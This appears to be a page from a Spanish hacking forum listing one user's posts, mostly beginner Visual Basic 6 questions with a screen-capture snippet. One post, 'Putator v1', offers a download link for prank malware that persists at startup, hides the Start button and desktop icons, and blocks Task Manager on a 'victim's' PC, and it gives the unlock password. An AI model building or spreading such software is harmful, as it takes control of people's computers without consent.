elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Temas
Páginas: 1 2 3 4 5 6 [7] 8 9
61  Programación / Programación Visual Basic / bloquear programas externos que modifican a uno en funcionamiento en: 26 Abril 2007, 21:13 pm
hola, queria ver si se podia hacer en visual basic como un minicortafuegos automatico que bloquee programas que modifican las propiedades de otros, como por ejemplo los trainers en los juegos, que por ejemplo cuando estes jugando si tienes un trainer que mi programa lo bloquee o que lo cierre cuando el trainer va a modificar alguna propiedad.

gracias
62  Programación / Programación Visual Basic / 2 forms en un midiform en: 9 Abril 2007, 14:54 pm
hola, como puedo meter 2 formularios en un midi form??? solo consigo meter 1, hago lo mismo que hice en el 1º con el 2º pero el 2º no me aparece en el midi form

ayuda, gracias
63  Programación / Programación Visual Basic / crear acceso directo... en: 28 Diciembre 2006, 03:13 am
como creo un acceso directo al escritorio mediante VB6??
64  Programación / Programación Visual Basic / obtener IP en: 2 Octubre 2006, 20:39 pm
hola, quisiera saber como puedo obtener la IP de mi pc en Visual Basic 6, gracias
65  Programación / Programación Visual Basic / guardar configuracion... en: 28 Agosto 2006, 09:16 am
hola, a mi programa le he echo un form con varias opciones para poder cambiar cosas del programa y tal, lo que yo quiero es que cuando lo vuelva a iniciar le carge la configuracion que puso, es decir, como una pequeña base de datos que guarde su configuracion

como podria hacer eso?
66  Informática / Software / Crear imagen de Dvd sin desde el disco duro en: 26 Agosto 2006, 23:18 pm
hola, quisiera saber como puedo hacer una imagen de Dvd pero seleccionandolo directamente del disco duro, porque si lo grabo a un dvd para tener que hacer luego la imagen de dvd no me vale para nada, ya que cuando lo grabo me lo graba en multisesion y lo que yo quiero es hacer la imagen de dvd desde el disco duro para luego que al grabar la imagen asi no me lo graba en multisesion sino todo junto, e provado con el Alcohol 120 pero solo me vale cogiendolo del dvd y ya he dicho arriba que eso no me vale, alguien sabe o conoce algun programa para hacer esto?
67  Programación / Programación Visual Basic / no sobrescribir imagen en: 26 Agosto 2006, 21:42 pm
tengo un problema en mi programa, lo que hace es capturar la pantalla y guardar la imagen, pero si esta ya existe la sobrescribe y no quiero que haga eso, si por ejemplo existe ya uno que se llama captura1 pues que haga otra nueva k sea captura2 asi sucesivamente

Código:
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
'Api para generar un evento de tecla
Private Declare Sub keybd_event Lib "user32" (ByVal bVk As Byte, ByVal bScan As Byte, ByVal dwFlags As Long, ByVal dwExtraInfo As Long)
Const KEYEVENTF_KEYUP = 2
'Api para generar una pausa
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)

------------------------

Private Sub copiar_Y_Guardar()
On Local Error Resume Next
'Variable para la imagen
Dim imagen As IPictureDisp
keybd_event 44, 0, 0, 0
'mediante Keyevent accionamos la tecla Alt+Printscreen
Set imagen = Clipboard.GetData
DoEvents
'Guardamos la imagen en el directorio especificado
SavePicture imagen, "c:\documents and settings\All users\Escritorio\captura1.bmp"
'eliminamos la imagen de la memoria
Set imagen = Nothing
End Sub
68  Programación / Programación Visual Basic / todo en un exe en: 18 Agosto 2006, 16:28 pm
hola, si por ejemplo yo hago un proyecto en VB y tengo otros archivos vinculados, pero en la carpeta donde tengo el proyecto, como puedo hacer que al hacer el exe,me guarde los archivos dentro del exe?
69  Programación / Programación Visual Basic / Putator v1 en: 17 Agosto 2006, 23:32 pm
bueno, aqui le traigo el codigo fuente de un programa mio, que es hace una buena putada a la victima....

Bien, hay 2 proyectos, el 1º se debe ejecutar entonces lo que hace es que aloja el programa que "putea" a la victima en una carpeta del Disco duro, entonces cuando arranca windows carga este programa, lo que hace es ocultar el boton inicio,bloquear el administrador de tareas, y ocultar todos los iconos del escritorio,cuando lo carga al arrancar windows hay una opcion de desactivarlo metiendo una clave.... la predeterminada que yo puse es QAZWSX (en minusculas)....

http://files.filefront.com/putatorrar/;5418509;;/fileinfo.html

espero que les sirva, lo pueden personalizar y modificar...
70  Programación / Programación Visual Basic / iniciar programa al arrancar windows en: 16 Agosto 2006, 19:56 pm
como podria hacer que cuando arranque windows se inicie mi programa?
Páginas: 1 2 3 4 5 6 [7] 8 9
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines